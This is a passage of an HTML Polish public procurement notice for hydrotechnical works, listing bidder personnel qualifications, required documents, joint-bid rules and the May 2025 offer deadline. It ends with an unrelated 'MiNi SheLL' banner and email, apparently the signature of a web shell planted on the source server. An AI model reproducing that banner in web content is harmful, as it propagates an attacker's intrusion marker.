staż w kierowaniu robotami budowlanymi <br/>- posiadający uprawnienia budowlane w specjalności inżynieryjnej hydrotechnicznej lub konstrukcyjno – budowlanej do kierowania robotami budowlanymi w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych albo odpowiadające im równoważne uprawnienia wydane na podstawie ówcześnie obowiązujących przepisów prawa <br/>- zrzeszony we właściwej izbie samorządu zawodowego zgodnie z ustawą o samorządach zawodowych architektów oraz inżynierów budownictwa <br/>•	5 osób pracujących bezpośrednio w terenie <br/><br/>W zakresie części nr 5 : <br/>•	Projektant<br/>- z minimum 3-letnim stażem posiadający uprawnienia budowlane do projektowania w specjalności inżynieryjnej hydrotechnicznej, o których mowa w Rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29.04.2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie albo odpowiadające im równoważne uprawnienia w zakresie budowli hydrotechnicznych lub melioracji wodnych wydane na podstawie wcześniej obowiązujących przepisów <br/>- zrzeszony we właściwej terenowo izbie samorządu zawodowego zgodnie z ustawą o samorządach zawodowych architektów oraz inżynierów budownictwa <br/>- będący autorem lub współautorem min. 1 dokumentacji projektowej z zakresu budowy, odbudowy lub remontu budowli hydrotechnicznych / obiektów zabudowy regulacyjnej o wartości min. 70 000,00 zł<br/>•	kierownik budowy / robót: <br/>	- posiadający min. 5-letni staż w kierowaniu robotami budowlanymi <br/>- posiadający uprawnienia budowlane w specjalności inżynieryjnej hydrotechnicznej lub konstrukcyjno – budowlanej do kierowania robotami budowlanymi w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych albo odpowiadające im równoważne uprawnienia wydane na podstawie ówcześnie obowiązujących przepisów prawa <br/>- zrzeszony we właściwej izbie samorządu zawodowego zgodnie z ustawą o samorządach zawodowych architektów oraz inżynierów budownictwa <br/>•	6 osób pracujących bezpośrednio w terenie <br/><br/>W przypadku gdy Wykonawca składa ofertę na więcej niż jedną część, Zamawiający dopuszcza możliwość przedstawienia wykonania tej samej roboty budowlanej obejmującej wymagane rodzaje robót dla dwóch lub więcej części, na które składa ofertę pod warunkiem, że suma robót do wykazania z tych części nie przekroczy ilości w przedstawionym dokumencie.<br/><br/>W przypadku gdy Wykonawca składa ofertę na więcej niż jedną część Zamawiający dopuszcza dysponowanie tą samą osobą kierownika budowy oraz osobami fizycznymi przewidzianymi do realizacji zamówienia na więcej niż jedną część w wykazie osób. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, zgodnego z wzorem stanowiącym Załącznik nr 5 do SWZ;<br/>2.	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>3. oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnego z wzorem stanowiącym Załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	wykaz robót budowlanych, zgodny z wzorem stanowiącym Załącznik nr 7 do SWZ, wykonanych nie wcześniej niż w okresie ostatnich 7 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, <br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>Treść zawarta w wykazie musi potwierdzać spełnienie warunku, o którym mowa w punkcie 7.2.4 ppkt 1) SWZ.<br/>2.	wykaz osób zgodny z wzorem stanowiącym Załącznik nr 8 do SWZ, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Treść zawarta w wykazie musi potwierdzać spełnienie warunku, o którym mowa w punkcie 7.2.4 ppkt 2) SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularze wyceny ofertowej dla części zamówienia na które Wykonawca składa ofertę – zgodne w treści z Załącznikiem Nr 3 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 11.1.	Zamawiający, dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>11.2.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>11.3.	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy wpisać w Formularzu oferty.<br/>11.4.	Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika takie pełnomocnictwo należy złożyć razem z ofertą.<br/>11.5.	W odniesieniu do warunków określonych w pkt 7.2 SWZ, wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (nie musi ich spełniać osobno każdy z Wykonawców składających ofertę wspólną). Na ich potwierdzenie należy złożyć dokumenty określone w pkt 10.4 SWZ.<br/>11.6.	Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne z treścią Załącznika Nr 4 do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że każdy z Wykonawców ubiegających się wspólnie o zamówienie nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4, ustawy Pzp, art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, oraz spełnia warunki udziału w postępowaniu określone w SWZ w zakresie, w którym każdy z nich wykazuje brak podstaw wykluczenia z postępowania oraz spełnia warunki udziału w postępowaniu.<br/>11.7.	Każdy z Wykonawców występujących wspólnie obowiązany jest do wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego. W takim przypadku oświadczenia lub dokumenty wymienione w pkt 10.3 SWZ składa każdy z Wykonawców występujących wspólnie.<br/>11.8.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 18.3.	Na podstawie art. 455 ust. 1 ustawy Pzp, Zamawiający informuje, że przewiduje możliwość zmian postanowień zawartej umowy w przypadkach określonych <br/>w §12 (część 1, 2 i 4) oraz §16 (część 3 i 5) Projektowanych postanowień umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://przetargi.wody.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-29 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com